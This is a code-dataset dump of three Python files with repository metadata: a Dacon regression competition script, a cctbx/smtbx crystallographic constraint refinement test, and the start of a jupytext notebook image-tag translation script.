submission=pd.read_csv('./data/dacon/comp1/sample_submission.csv',header=0,index_col=0)
print("train.shape:",train.shape) # (10000, 75) # x_train , x_test , y_train , y_test/ 평가도 train으로
print("test.shape:",test.shape) # (10000, 71) # x_predict가 된다 # y값이 없다
print("submission.shape:",submission.shape) # (10000, 4) # y_predict가 된다
# test + submission = train
# test는 y값이 없음
#이상치는 알 수 없으나 결측치는 알 수 있다.
print(train.isnull().sum())
train=train.interpolate() #보간법//선형//완벽하진 않으나 평타 85%//컬럼별로 선을 잡아서 빈자리 선에 맞게 그려준다//컬럼별 보간
train=train.fillna(method='bfill')
print(train.isnull().sum())
print("train:",train.head())
print(test.isnull().sum())
test=test.interpolate()
test=test.fillna(method='bfill')
print("test:",test.head())
np.save('./data/comp1_train.npy',arr=train)
np.save('./data/comp1_test.npy',arr=test)
# 1. 데이터
train=np.load('./data/comp1_train.npy')
test=np.load('./data/comp1_test.npy')
from sklearn.model_selection import train_test_split, RandomizedSearchCV
from keras.layers import Dense, LSTM, Conv2D, MaxPooling2D, Flatten, Input
from keras.models import Sequential, Model
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold, cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
import warnings
from sklearn.tree import DecisionTreeRegressor
x=train[0:,0:71]
y=train[0:,71:]
print("x.shape:",x.shape) # (10000, 71)
print("y.shape:",y.shape) # (10000, 4)
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2, random_state=60)
print("x_train.shape:",x_train.shape)
print("x_test.shape:",x_test.shape)
print("x_train",x_train)
print("x_test",x_test)
parameters={
'min_samples_leaf':[1,2,4,8,16],
'min_samples_split':[1,2,4,8,16]
}
warnings.simplefilter(action='ignore', category=FutureWarning)
#kfold
kfold=KFold(n_splits=5,shuffle=True)
#pipeline
# pipe = Pipeline([("scaler",StandardScaler()),('model',RandomForestRegressor())])
#모델구성
model=RandomizedSearchCV(DecisionTreeRegressor(),parameters,cv=kfold,n_jobs=-1)
#모델훈련
model.fit(x_train,y_train)
print("최적의 매개변수=",model.best_estimators_.feature_importances_)
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_feature_importances_(model):
n_features=train.data.shape[1]
plt.barh(np.arange(n_features),model.feature_importances_, align='center')
plt.yticks(np.arange(n_features),model.feature_names)
plt.xlabel("Feature importance")
plt.ylabel("Features")
plt.ylim(-1,n_features)
plt.subplots(figsize=(15,6))
plot_feature_importances_(model)
plt.show()
"""
"""
#평가, 예측
y_predict=model.predict(x_test)
result=model.predict(test)
from sklearn.metrics import mean_absolute_error
mae=mean_absolute_error(y_test,y_predict)
print("mae:",mae)
a = np.arange(10000,20000)
#np.arange--수열 만들때
submission = result
submission = pd.DataFrame(submission, a)
submission.to_csv("./data/dacon/comp1/sample_submission1_7.csv", header = ["hhb", "hbo2", "ca", "na"], index = True, index_label="id" )
"""
mae: 1.537
"""
"""
| [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
a419d98b7e7020b5597fbd248dee1c7eec735a51 | 09e5cfe06e437989a2ccf2aeecb9c73eb998a36c | /modules/cctbx_project/smtbx/refinement/constraints/tests/tst_constrained_structure.py | 26b0ce0053bab5553d753b971f90eeb004be5266 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | jorgediazjr/dials-dev20191018 | b81b19653624cee39207b7cefb8dfcb2e99b79eb | 77d66c719b5746f37af51ad593e2941ed6fbba17 | refs/heads/master | 2020-08-21T02:48:54.719532 | 2020-01-25T01:41:37 | 2020-01-25T01:41:37 | 216,089,955 | 0 | 1 | BSD-3-Clause | 2020-01-25T01:41:39 | 2019-10-18T19:03:17 | Python | UTF-8 | Python | false | false | 28,930 | py | from __future__ import absolute_import, division, print_function
from operator import itemgetter
from cctbx import crystal, xray
from cctbx.array_family import flex
from smtbx.refinement import constraints
import smtbx.refinement.constraints.all as _
import smtbx.refinement.constraints as core
import smtbx.utils
from smtbx.refinement import least_squares
from smtbx import development
from scitbx.lstbx import normal_eqns_solving
from scitbx import matrix
from six.moves import zip
class test_case(object):
expected_reparametrisation_for_hydrogen_named = None
expected_mapping_to_grad_fc = None
def __init__(self, normal_eqns_solving_method):
self.normal_eqns_solving_method = normal_eqns_solving_method
def check_reparametrisation_construction(self):
warned_once = False
for sc, params in zip(
self.reparametrisation.structure.scatterers(),
self.reparametrisation.asu_scatterer_parameters
):
if sc.scattering_type != 'H':
assert (
(isinstance(params.site, core.independent_site_parameter)
and
isinstance(params.u, core.independent_u_star_parameter)
)
or
(isinstance(params.site, core.special_position_site_parameter)
and
isinstance(params.u, core.special_position_u_star_parameter))
)
assert params.site.scatterers[0].label == sc.label
assert params.u.scatterers[0].label == sc.label
assert isinstance(params.occupancy,
core.independent_occupancy_parameter)
assert params.occupancy.scatterers[0].label == sc.label
else:
try:
(expected_type, expected_pivot) = \
self.expected_reparametrisation_for_hydrogen_named[sc.label]
assert isinstance(params.site, expected_type), \
(sc.label, params.site, expected_type)
assert ([ sc1.label for sc1 in params.site.argument(0).scatterers ]
== [expected_pivot]), sc.label
except KeyError:
if not warned_once:
print("Warning: incomplete test coverage for H constraint types")
warned_once = True
continue
self.check_reparametrisation_construction_more()
def check_reparametrisation_construction_more(self):
""" To be overriden by heirs that needs to perform extra tests """
def check_mapping_to_grad_fc(self):
if self.expected_mapping_to_grad_fc is not None:
assert (tuple(self.reparametrisation.mapping_to_grad_fc)
== self.expected_mapping_to_grad_fc)
else:
print("No mapping to grad Fc test")
def check_refinement_stability(self):
if not self.shall_refine_thermal_displacements:
for sc in self.xray_structure.scatterers():
sc.flags.set_grad_site(True)
if sc.flags.use_u_aniso(): sc.flags.set_grad_u_aniso(False)
if sc.flags.use_u_iso(): sc.flags.set_grad_u_iso(False)
xs = self.xray_structure
xs0 = self.reference_xray_structure = xs.deep_copy_scatterers()
mi = xs0.build_miller_set(anomalous_flag=False, d_min=0.5)
fo_sq = mi.structure_factors_from_scatterers(
xs0, algorithm="direct").f_calc().norm()
fo_sq = fo_sq.customized_copy(sigmas=flex.double(fo_sq.size(), 1))
xs.shake_sites_in_place(rms_difference=0.1)
if self.shall_refine_thermal_displacements:
# a spread of 10 for u_iso's would be enormous for our low temperature
# test structures if those u_iso's were not constrained
xs.shake_adp(spread=10, # absolute
aniso_spread=0.2) # relative
self.reparametrisation = constraints.reparametrisation(
xs, self.constraints, self.connectivity_table,
temperature=self.t_celsius)
obs = fo_sq.as_xray_observations()
ls = least_squares.crystallographic_ls(
obs,
self.reparametrisation,
weighting_scheme=least_squares.mainstream_shelx_weighting())
self.cycles = self.normal_eqns_solving_method(ls)
print ("%i %s iterations to recover from shaking"
% (self.cycles.n_iterations,
self.cycles))
if 0:
from crys3d.qttbx.xray_structure_viewer import display
display(xray_structure=xs)
diff = xray.meaningful_site_cart_differences(xs0, xs)
assert diff.max_absolute() < self.site_refinement_tolerance,\
self.__class__.__name__
if self.shall_refine_thermal_displacements:
delta_u = []
for sc, sc0 in zip(xs.scatterers(), xs0.scatterers()):
if not sc.flags.use_u_aniso() or not sc0.flags.use_u_aniso(): continue
delta_u.extend(matrix.col(sc.u_star) - matrix.col(sc0.u_star))
delta_u = flex.double(delta_u)
assert flex.max_absolute(delta_u) < self.u_star_refinement_tolerance,\
self.__class__.__name__
def display_structure(self):
from crys3d.qttbx.xray_structure_viewer import display
display(xray_structure=self.xray_structure)
def run(self):
print("[ %s ]" % self.__class__.__name__)
self.connectivity_table = smtbx.utils.connectivity_table(
self.xray_structure)
for sc in self.xray_structure.scatterers():
sc.flags.set_grad_site(True)
if sc.flags.use_u_aniso(): sc.flags.set_grad_u_aniso(True)
if sc.flags.use_u_iso(): sc.flags.set_grad_u_iso(True)
self.reparametrisation = constraints.reparametrisation(
self.xray_structure,
self.constraints,
self.connectivity_table,
temperature=self.t_celsius,
)
self.check_reparametrisation_construction()
self.check_mapping_to_grad_fc()
# above settings are customised in the following tests
self.check_refinement_stability()
class sucrose_test_case(test_case):
"""
sucrose from Olex 2 samples
Notes:
- atom H2A has been moved down the list to test non-contiguous indices
in argument 'constrained_site_indices'
- the sites of H12A and H12B have been swapped (this is purely conventional:
it turns out that the smtbx code does not follow that of ShelXL which
was used to produce this structure in the first place)
"""
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = development.sucrose()
self.t_celsius = 20
self.shall_refine_thermal_displacements = False
self.constraints = [
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=1,
constrained_site_indices=(2,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=3,
constrained_site_indices=(4,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=5,
constrained_site_indices=(6,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=7,
constrained_site_indices=(8,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=10,
constrained_site_indices=(11,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=12,
constrained_site_indices=(13,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=14,
constrained_site_indices=(15,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=16,
constrained_site_indices=(17,)),
_.tertiary_xh_site(
pivot=19,
constrained_site_indices=(20,)),
_.secondary_xh2_sites(
pivot=21,
flapping = True,
constrained_site_indices=(26, 22)),
_.tertiary_xh_site(
pivot=23,
constrained_site_indices=(24,)),
_.tertiary_xh_site(
pivot=25,
constrained_site_indices=(27,)),
_.tertiary_xh_site(
pivot=28,
constrained_site_indices=(29,)),
_.tertiary_xh_site(
pivot=30,
constrained_site_indices=(31,)),
_.secondary_xh2_sites(
pivot=33,
flapping = True,
constrained_site_indices=(35, 34)),
_.tertiary_xh_site(
pivot=36,
constrained_site_indices=(37,)),
_.tertiary_xh_site(
pivot=38,
constrained_site_indices=(39,)),
_.tertiary_xh_site(
pivot=40,
constrained_site_indices=(41,)),
_.secondary_xh2_sites(
pivot=42,
flapping = True,
constrained_site_indices=(43, 44)),
]
self.expected_reparametrisation_for_hydrogen_named = {
"H2": (core.terminal_tetrahedral_xh_site, 'O2'),
"H3": (core.terminal_tetrahedral_xh_site, 'O3'),
"H4": (core.terminal_tetrahedral_xh_site, 'O4'),
"H5": (core.terminal_tetrahedral_xh_site, 'O5'),
"H7": (core.terminal_tetrahedral_xh_site, 'O7'),
"H8": (core.terminal_tetrahedral_xh_site, 'O8'),
"H9": (core.terminal_tetrahedral_xh_site, 'O9'),
"H10": (core.terminal_tetrahedral_xh_site, 'O10'),
"H1": (core.tertiary_xh_site, 'C1'),
"H2A": (core.secondary_xh2_sites, 'C2'),
"H2B": (core.secondary_xh2_sites, 'C2'),
"H3B": (core.tertiary_xh_site, 'C3'),
"H4B": (core.tertiary_xh_site, 'C4'),
"H5B": (core.tertiary_xh_site, 'C5'),
"H6": (core.tertiary_xh_site, 'C6'),
"H8A": (core.secondary_xh2_sites, 'C8'),
"H8B": (core.secondary_xh2_sites, 'C8'),
"H9B": (core.tertiary_xh_site, 'C9'),
"H10B": (core.tertiary_xh_site, 'C10'),
"H11": (core.tertiary_xh_site, 'C11'),
"H12A": (core.secondary_xh2_sites, 'C12'),
"H12B": (core.secondary_xh2_sites, 'C12'),
}
self.expected_mapping_to_grad_fc = (
59,60,61 , # O1.site
80,81,82,83,84,85 , # O1.u
0,1,2 , # O2.site
86,87,88,89,90,91 , # O2.u
304,305,306 , # H2.site
92 , # H2.u
7,8,9 , # O3.site
93,94,95,96,97,98 , # O3.u
307,308,309 , # H3.site
99 , # H3.u
14,15,16 , # O4.site
100,101,102,103,104,105 , # O4.u
310,311,312 , # H4.site
106 , # H4.u
21,22,23 , # O5.site
107,108,109,110,111,112 , # O5.u
313,314,315 , # H5.site
113 , # H5.u
76,77,78 , # O6.site
114,115,116,117,118,119 , # O6.u
28,29,30 , # O7.site
120,121,122,123,124,125 , # O7.u
316,317,318 , # H7.site
126 , # H7.u
35,36,37 , # O8.site
127,128,129,130,131,132 , # O8.u
319,320,321 , # H8.site
133 , # H8.u
42,43,44 , # O9.site
134,135,136,137,138,139 , # O9.u
322,323,324 , # H9.site
140 , # H9.u
49,50,51 , # O10.site
141,142,143,144,145,146 , # O10.u
325,326,327 , # H10.site
147 , # H10.u
66,67,68 , # O11.site
148,149,150,151,152,153 , # O11.u
56,57,58 , # C1.site
154,155,156,157,158,159 , # C1.u
328,329,330 , # H1.site
160 , # H1.u
3,4,5 , # C2.site
161,162,163,164,165,166 , # C2.u
334,335,336 , # H2B.site
167 , # H2B.u
10,11,12 , # C3.site
168,169,170,171,172,173 , # C3.u
337,338,339 , # H3B.site
174 , # H3B.u
17,18,19 , # C4.site
175,176,177,178,179,180 , # C4.u
331,332,333 , # H2A.site
181 , # H2A.u
340,341,342 , # H4B.site
182 , # H4B.u
24,25,26 , # C5.site
183,184,185,186,187,188 , # C5.u
343,344,345 , # H5B.site
189 , # H5B.u
63,64,65 , # C6.site
190,191,192,193,194,195 , # C6.u
346,347,348 , # H6.site
196 , # H6.u
69,70,71 , # C7.site
197,198,199,200,201,202 , # C7.u
52,53,54 , # C8.site
203,204,205,206,207,208 , # C8.u
352,353,354 , # H8A.site
209 , # H8A.u
349,350,351 , # H8B.site
210 , # H8B.u
45,46,47 , # C9.site
211,212,213,214,215,216 , # C9.u
355,356,357 , # H9B.site
217 , # H9B.u
38,39,40 , # C10.site
218,219,220,221,222,223 , # C10.u
358,359,360 , # H10B.site
224 , # H10B.u
73,74,75 , # C11.site
225,226,227,228,229,230 , # C11.u
361,362,363 , # H11.site
231 , # H11.u
31,32,33 , # C12.site
232,233,234,235,236,237 , # C12.u
364,365,366 , # H12B.site
238 , # H12B.u
367,368,369 , # H12A.site
239 , # H12A.u
)
self.site_refinement_tolerance = 1e-4
class saturated_test_case(test_case):
""" Durham database: 03srv020
H1N and H2N sites and u's have been swapped.
"""
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = xray.structure(
crystal_symmetry=crystal.symmetry(
unit_cell=(3.753, 14.54, 15.868, 90, 92.58, 90),
space_group_symbol='hall: -P 2ybc (x-z,y,z)'),
scatterers=flex.xray_scatterer((
xray.scatterer( #0
label='O1',
site=(0.299733, 0.262703, 0.397094),
u=(0.003622, 0.000123, 0.000108,
0.000154, -0.000304, -0.000017)),
xray.scatterer( #1
label='O2',
site=(0.606432, 0.145132, 0.437285),
u=(0.004117, 0.000149, 0.000118,
0.000405, -0.000117, -0.000042)),
xray.scatterer( #2
label='N1',
site=(0.481175, 0.221358, 0.451529),
u=(0.001750, 0.000091, 0.000090,
0.000016, -0.000027, -0.000000)),
xray.scatterer( #3
label='N2',
site=(0.669716, 0.393801, 0.763893),
u=(0.002874, 0.000122, 0.000071,
0.000168, -0.000071, -0.000000)),
xray.scatterer( #4
label='H1N',
site=(0.777763, 0.365311, 0.806784),
u=0.042273),
xray.scatterer( #5
label='H2N',
site=(0.589373, 0.450143, 0.770096),
u=0.042273),
xray.scatterer( #6
label='C1',
site=(0.542801, 0.263225, 0.532794),
u=(0.001423, 0.000084, 0.000076,
-0.000009, 0.000000, -0.000003)),
xray.scatterer( #7
label='C2',
site=(0.718203, 0.216166, 0.600719),
u=(0.001241, 0.000081, 0.000088,
-0.000011, 0.000023, 0.000009)),
xray.scatterer( #8
label='C3',
site=(0.754550, 0.260840, 0.677732),
u=(0.001553, 0.000097, 0.000079,
0.000044, -0.000014, 0.000019)),
xray.scatterer( #9
label='H3',
site=(0.868083, 0.229804, 0.724284),
u=0.031215),
xray.scatterer( #10
label='C4',
site=(0.627437, 0.351296, 0.688971),
u=(0.001601, 0.000093, 0.000075,
0.000015, 0.000027, 0.000004)),
xray.scatterer( #11
label='C5',
site=(0.454744, 0.396843, 0.619275),
u=(0.001302, 0.000082, 0.000083,
-0.000002, -0.000011, 0.000007)),
xray.scatterer( #12
label='C6',
site=(0.414545, 0.352153, 0.542558),
u=(0.001310, 0.000086, 0.000080,
0.000014, -0.000038, 0.000012)),
xray.scatterer( #13
label='H6',
site=(0.298067, 0.382503, 0.496003),
u=0.028457),
xray.scatterer( #14
label='C7',
site=(0.870740, 0.125780, 0.594964),
u=(0.001485, 0.000100, 0.000087,
0.000015, 0.000006, 0.000009)),
xray.scatterer( #15
label='C8',
site=(1.017756, 0.053520, 0.594148),
u=(0.002161, 0.000095, 0.000112,
0.000070, 0.000030, 0.000015)),
xray.scatterer( #16
label='H8',
site=(1.135411, -0.004309, 0.593494),
u=0.039284),
xray.scatterer( #17
label='C9',
site=(0.317957, 0.487839, 0.631013),
u=(0.001562, 0.000101, 0.000080,
0.000008, -0.000022, 0.000009)),
xray.scatterer( #18
label='C10',
site=(0.204108, 0.561746, 0.646136),
u=(0.001931, 0.000100, 0.000123,
0.000052, -0.000025, -0.000002)),
xray.scatterer( #19
label='H10',
site=(0.112835, 0.620998, 0.658260),
u=0.039775)
)))
self.t_celsius = -153
self.shall_refine_thermal_displacements = True
k=1.5 # that is the multiplier used to refine the structure with ShelXL
self.constraints = [
_.terminal_planar_xh2_sites(
pivot=3,
constrained_site_indices=(4, 5)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=3,
u_iso_scatterer_idx=4,
multiplier=k),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=3,
u_iso_scatterer_idx=5,
multiplier=k),
_.terminal_linear_ch_site(
pivot=15,
constrained_site_indices=(16,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=15,
u_iso_scatterer_idx=16,
multiplier=k),
_.terminal_linear_ch_site(
pivot=18,
constrained_site_indices=(19,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=18,
u_iso_scatterer_idx=19,
multiplier=k),
_.secondary_planar_xh_site(
pivot=12,
constrained_site_indices=(13,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=12,
u_iso_scatterer_idx=13,
multiplier=k),
_.secondary_planar_xh_site(
pivot=8,
constrained_site_indices=(9,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=8,
u_iso_scatterer_idx=9,
multiplier=k),
]
self.expected_reparametrisation_for_hydrogen_named = {
'H1N': (core.terminal_planar_xh2_sites, 'N2'),
'H2N': (core.terminal_planar_xh2_sites, 'N2'),
'H10': (core.terminal_linear_ch_site, 'C10'),
'H6' : (core.secondary_planar_xh_site, 'C6'),
'H3' : (core.secondary_planar_xh_site, 'C3'),
'H8': (core.terminal_linear_ch_site, 'C8'),
}
self.site_refinement_tolerance = 1e-2
self.u_star_refinement_tolerance = 1e-5
class symmetry_equivalent_test_case(test_case):
""" 09srv172 from Durham database """
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = xray.structure(
crystal_symmetry=crystal.symmetry(
unit_cell=(17.0216, 8.4362, 10.2248, 90, 102.79, 90),
space_group_symbol='hall: -C 2yc'),
scatterers=flex.xray_scatterer((
xray.scatterer( #0
label='S1',
site=(0.525736, 0.737492, 0.619814),
u=(0.000084, 0.000243, 0.000191,
0.000021, 0.000026, -0.000035)),
xray.scatterer( #1
label='C1',
site=(0.500000, 0.868009, 0.750000),
u=(0.000061, 0.000181, 0.000164,
0.000000, 0.000025, 0.000000)),
xray.scatterer( #2
label='C2',
site=(0.533017, 0.552825, 0.710913),
u=(0.000161, 0.000241, 0.000348,
0.000041, 0.000039, -0.000020)),
xray.scatterer( #3
label='H2A',
site=(0.525986, 0.462184, 0.647894),
u=0.041420),
xray.scatterer( #4
label='H2B',
site=(0.586473, 0.543642, 0.772877),
u=0.038360),
xray.scatterer( #5
label='C3',
site=(0.425914, 0.971290, 0.682589),
u=(0.000058, 0.000199, 0.000164,
-0.000003, 0.000017, -0.000007)),
xray.scatterer( #6
label='H3',
site=(0.441258, 1.029902, 0.606966),
u=0.023950),
xray.scatterer( #7
label='C4',
site=(0.349971, 0.874741, 0.622481),
u=(0.000064, 0.000236, 0.000219,
-0.000015, 0.000011, -0.000014)),
xray.scatterer( #8
label='H4B',
site=(0.362228, 0.799281, 0.555566),
u=0.026970),
xray.scatterer( #9
label='H4A',
site=(0.333906, 0.812566, 0.694426),
u=0.025070),
xray.scatterer( #10
label='C5',
site=(0.279832, 0.981636, 0.555089),
u=(0.000064, 0.000307, 0.000222,
-0.000007, 0.000003, -0.000021)),
xray.scatterer( #11
label='H5B',
site=(0.294150, 1.037327, 0.478372),
u=0.026970),
xray.scatterer( #12
label='H5A',
site=(0.231706, 0.915594, 0.519984),
u=0.034720),
xray.scatterer( #13
label='C6',
site=(0.259978, 1.103478, 0.653453),
u=(0.000061, 0.000335, 0.000246,
0.000016, 0.000021, -0.000001)),
xray.scatterer( #14
label='H6B',
site=(0.216403, 1.174193, 0.606307),
u=0.037560),
xray.scatterer( #15
label='H6A',
site=(0.240791, 1.048477, 0.726038),
u=0.024860),
xray.scatterer( #16
label='C7',
site=(0.334517, 1.201490, 0.713404),
u=(0.000071, 0.000265, 0.000251,
0.000019, 0.000019, -0.000029)),
xray.scatterer( #17
label='H7B',
site=(0.349843, 1.265431, 0.641770),
u=0.031500),
xray.scatterer( #18
label='H7A',
site=(0.321733, 1.275376, 0.780996),
u=0.030620),
xray.scatterer( #19
label='C8',
site=(0.405687, 1.096392, 0.779637),
u=(0.000064, 0.000247, 0.000187,
0.000009, 0.000015, -0.000033)),
xray.scatterer( #20
label='H8A',
site=(0.392638, 1.042204, 0.858057),
u=0.026000),
xray.scatterer( #21
label='H8B',
site=(0.453574, 1.163891, 0.812432),
u=0.027360)
)))
self.t_celsius = -153
self.shall_refine_thermal_displacements = True
self.constraints = [
_.secondary_xh2_sites(
pivot=2,
constrained_site_indices=(3,4)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=2,
u_iso_scatterer_idx=3,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=2,
u_iso_scatterer_idx=4,
multiplier=1.5),
_.tertiary_xh_site(
pivot=5,
constrained_site_indices=(6,)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=5,
u_iso_scatterer_idx=6,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=7,
constrained_site_indices=(8, 9)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=7,
u_iso_scatterer_idx=8,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=7,
u_iso_scatterer_idx=9,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=10,
constrained_site_indices=(11, 12)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=10,
u_iso_scatterer_idx=11,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=10,
u_iso_scatterer_idx=12,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=13,
constrained_site_indices=(14, 15)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=13,
u_iso_scatterer_idx=14,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=13,
u_iso_scatterer_idx=15,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=16,
constrained_site_indices=(17, 18)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=16,
u_iso_scatterer_idx=17,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=16,
u_iso_scatterer_idx=18,
multiplier=1.5),
_.secondary_xh2_sites(
pivot=19,
constrained_site_indices=(20, 21)),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=19,
u_iso_scatterer_idx=20,
multiplier=1.5),
_.u_iso_proportional_to_pivot_u_eq(
u_eq_scatterer_idx=19,
u_iso_scatterer_idx=21,
multiplier=1.5),
]
self.expected_reparametrisation_for_hydrogen_named = {
"H2A": (core.secondary_xh2_sites, 'C2'),
"H2B": (core.secondary_xh2_sites, 'C2'),
"H3" : (core.tertiary_xh_site , 'C3'),
"H4A": (core.secondary_xh2_sites, 'C4'),
"H4B": (core.secondary_xh2_sites, 'C4'),
"H5A": (core.secondary_xh2_sites, 'C5'),
"H5B": (core.secondary_xh2_sites, 'C5'),
"H6A": (core.secondary_xh2_sites, 'C6'),
"H6B": (core.secondary_xh2_sites, 'C6'),
"H7A": (core.secondary_xh2_sites, 'C7'),
"H7B": (core.secondary_xh2_sites, 'C7'),
"H8A": (core.secondary_xh2_sites, 'C8'),
"H8B": (core.secondary_xh2_sites, 'C8'),
}
self.site_refinement_tolerance = 0.01
self.u_star_refinement_tolerance = 5e-7
def check_reparametrisation_construction_more(self):
for params in self.reparametrisation.asu_scatterer_parameters:
if params.site.scatterers[0].label == 'H2A':
h2a = params.site
(pivot, pivot_neighbour_0, pivot_neighbour_1,
bond_length, h_c_h_angle) = h2a.arguments()
expected = sorted([ (core.independent_site_parameter, 'S1'),
(core.symmetry_equivalent_site_parameter, 'C2',
'-x+1,y,-z+3/2') ], key=itemgetter(1))
actual = []
for n in (pivot_neighbour_0, pivot_neighbour_1):
if type(n) == core.independent_site_parameter:
actual.append((type(n), n.scatterers[0].label))
elif type(n) == core.symmetry_equivalent_site_parameter:
actual.append((type(n),
n.original.scatterers[0].label,
str(n.motion)))
actual.sort(key=itemgetter(1))
assert actual == expected
def run():
import libtbx.utils
libtbx.utils.show_times_at_exit()
import sys
from libtbx.option_parser import option_parser
command_line = (option_parser()
.option(None, "--normal_eqns_solving_method",
default='naive')
.option(None, "--fix_random_seeds",
action='store_true',
default='naive')
).process(args=sys.argv[1:])
opts = command_line.options
if opts.fix_random_seeds:
import random
random.seed(1)
flex.set_random_seed(1)
gradient_threshold=1e-8
step_threshold=1e-8
if opts.normal_eqns_solving_method == 'naive':
m = lambda eqns: normal_eqns_solving.naive_iterations(
eqns,
gradient_threshold=gradient_threshold,
step_threshold=step_threshold)
elif opts.normal_eqns_solving_method == 'levenberg-marquardt':
m = lambda eqns: normal_eqns_solving.levenberg_marquardt_iterations(
eqns,
gradient_threshold=gradient_threshold,
step_threshold=gradient_threshold,
tau=1e-7)
else:
raise RuntimeError("Unknown method %s" % opts.normal_eqns_solving_method)
for t in [
saturated_test_case(m),
sucrose_test_case(m),
symmetry_equivalent_test_case(m),
]:
t.run()
if __name__ == '__main__':
run()
| [
"jorge7soccer@gmail.com"
] | jorge7soccer@gmail.com |
a5e9844ef7a8111c56eb3a1649bb77022f0d4a5c | 49c3abd2b3fbb3bc5d1df47b1fddd09694ee4835 | /scripts/translate_figs.py | 6d2ad35b0719ad7472ee6b8091d0baa8be07d3e2 | [] | no_license | phaustin/e213_2019 | 0b9970745e1bee29b58fa97bd425b66e01c20db8 | ff66cc94cba57f53955cbbb4a72885146cabd5e4 | refs/heads/master | 2021-05-18T18:48:38.507719 | 2019-04-18T18:48:12 | 2019-04-18T18:48:12 | 251,362,114 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,387 | py | """
Usage: python translate_figs.py notebook.py
Given a jupytext python:percent notebook,
change all occurances of an image tag like:
<img src="figures/2d_flux.png" alt="pic05" width="20%" >
to a python Image call like this:
# Image(figures/2d_flux.png){width="20%"}
and write it out as a new file called notebook_nbsphinx.py
along with a translated notebook notebook_nbsphinx.ipynb
"""
import argparse
import json
import pdb
import re
import sys
from pathlib import Path
import jupytext
import nbformat
from bs4 import BeautifulSoup
from jupytext.formats import JUPYTEXT_FORMATS
from jupytext.formats import rearrange_jupytext_metadata
from jupytext.jupytext import writes
from nbconvert.preprocessors import CellExecutionError
from nbconvert.preprocessors import ExecutePreprocessor
from nbformat.v4.nbbase import new_code_cell
from nbformat.v4.nbbase import new_markdown_cell
from nbformat.v4.nbbase import new_notebook
split_cell_re = re.compile(r"(.*)(#\s+.*\<img\s+src.*\>)(.*)", re.DOTALL)
image_re = re.compile(r"#\s+.*(\<img.*\>).*")
image_re = re.compile(r".*(\<img\s+src.*\>).*")
template = '# {{width="{width:}"}}\n'
py_template = 'Image("{src:}",width="{width:}")\n'
toc_meta = {
"toc": {
"base_numbering": 1,
"nav_menu": {},
"number_sections": True,
"sideBar": True,
"skip_h1_title": True,
"title_cell": "Table of Contents",
"title_sidebar": "Contents",
"toc_cell": True,
"toc_position": {},
"toc_section_display": True,
"toc_window_display": True,
}
}
fmt_dict = {item.format_name: item for item in JUPYTEXT_FORMATS}
def make_parser():
"""
set up the command line arguments needed to call the program
"""
linebreaks = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(
formatter_class=linebreaks, description=__doc__.lstrip()
)
parser.add_argument("infile", type=str, help="name of pytnon notebook")
return parser
def main(args=None):
parser = make_parser()
args = parser.parse_args(args)
infile = Path(args.infile).resolve()
in_dir = infile.parent
py_outfile = in_dir / f"{infile.stem}_nbsphinx.py"
nb_outfile = in_dir.parent / f"{infile.stem}_nbsphinx.ipynb"
print(f"writing:\n{py_outfile}\n{nb_outfile}")
with open(infile, "r") as input_file:
in_py = input_file.readlines()
# collect = ""
# for the_line in in_py:
# match = image_re.match(the_line)
# if match:
# text = match.group(1)
# soup = BeautifulSoup(text, "html.parser")
# out = soup()
# md_image = template.format_map(out[0].attrs)
# collect += md_image
# else:
# collect += the_line
# with open(py_outfile, "w") as output_file:
# output_file.write(collect)
# with open(nb_outfile, "w") as output_file:
# nb = jupytext.readf(py_outfile)
# jupytext.writef(nb, nb_outfile, fmt="ipynb")
orig_nb = jupytext.readf(infile)
split_cell_re = re.compile(
r"^(?P<front>.*?)(?P<img>\<img\s+src.*\>)(?P<back>.*?)", re.DOTALL
)
need_display_import = True
new_nb_cells = list(orig_nb.cells)
